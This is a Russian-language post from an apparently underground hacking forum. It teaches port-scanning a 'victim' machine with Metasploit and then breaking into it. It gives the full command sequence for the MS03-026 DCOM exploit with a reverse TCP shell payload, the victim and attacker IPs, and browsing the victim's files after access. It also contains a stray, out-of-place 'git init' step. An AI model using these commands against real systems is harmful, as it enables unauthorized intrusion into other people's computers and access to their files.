Как просканировать любое устройство на уязвимости?

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

ФСБ

Участник

ФСБ

Участник
17 Ноя 2020
61
5
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Салом Кулхацкер! И так опрос был пройден.И теперь я буду выпускать только свои авторские статьи.Поэтому это моя вторая авторская статья.Надеюсь вам понравится.

И так сегодня у нас пойдет речь о Кибербезопасности.Ведь чтобы просканировать устройство на уязвимости.Для этого не обязательно знать все эксплоиты.

Сегодня мы будем использовать Metasploit.Ни все знают одну фишку метасплоита.И попытаемся не только просканировать устройство.Но и взломать его.У нас же как сказать канал про Хакеров.Совместим полезное с приятным.

Ну что ж приступим.

Можно такие действия повторять что и в linux что и в termux

Разницы нет

В kali , parrot , black arch он уже встроен.Чтобы его запустить просто пропишем команду :

msfconsole

В Termux нужно устанавливать

Для начала установим metasploit

apt update

apt install unstable-repo

apt install metasploit

Команда запуска:

msfconsole

Все мы запустили Metasploit

Теперь мы пишем команду

db_status

для проверки состояния базы данных метасплоита.

Если у вас Connected

Как на скриншоте

e449c4db1c79b8c5be6f9.png
Значит все в порядке.

Пропишем команду для старта пользования

git init



use auxiliary/scanner/portscan/tcp -Команда для сканирования открытых портов.

set PORTS 1-5000 - количество открытых портов .От 1 до 5000

set RHOSTS 192.168.88.161 - Вводим IP жертвы

run - команда запуска

search dcom - работа с эксплоитами dcom

4c3e74c2cf0ac551ed85d.png
У нас появляется вот такая панель.С эксплоитами.Выбираем тот эксплоит на котором написано No и ранг эксплоита great.Который подходит для взлома.Можно конечно выбрать любой.Но врятли он будет подходить для взлома.В данном случае я буду использовать эксплоит exploit/windows/dcerpc/ms03_026_dcom

Для этого пропишем команду

use exploit/windows/dcerpc/ms03_026_dcom

set payload windows/shell_reverse_tcp - команда для создания полезной нагрузки самая часто используемая для взлома.

show options - Команда для проверки того что нам нужно заполнить перед началом запуска эксплоита

7c9bee64c3d6a9f5bd475.png
Как мы видем у нас здесь не заполнено поле IP жертвы и IP злоумышленника

set RHOSTS 192.168.88.161 (IP той машины, которую будем проверять на защищенность)

set LHOST 192.168.88.247 - IP злоумышленника

run - команда запуска эксплоита.Если не работает пишем команду exploit



cd ..\..\ - команда для перехода в директорию файлов

Я прописал команду dir

Чтобы получить доступ ко всем файлам жертвы

cd5d54bfabbcbbc1b7b0e.png
Прописывая следующую команду мы можем создать текстовый файл.И послать жертве письмо

71f575842bc2e6cca046b.png


echo Hello! (кнопка стрелки на Ю) achtung.x



Ну вот и все ребят.Мы выполнили взлом жертвы Компьютера.За одно и просканировали на уязвимости.Как говорится полезное с приятным.

Ну а с вами был ФБР!Надеюсь вам понравились мои авторские статьи.

Буду писать еще.До скорых встреч!
 
Последнее редактирование модератором:

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя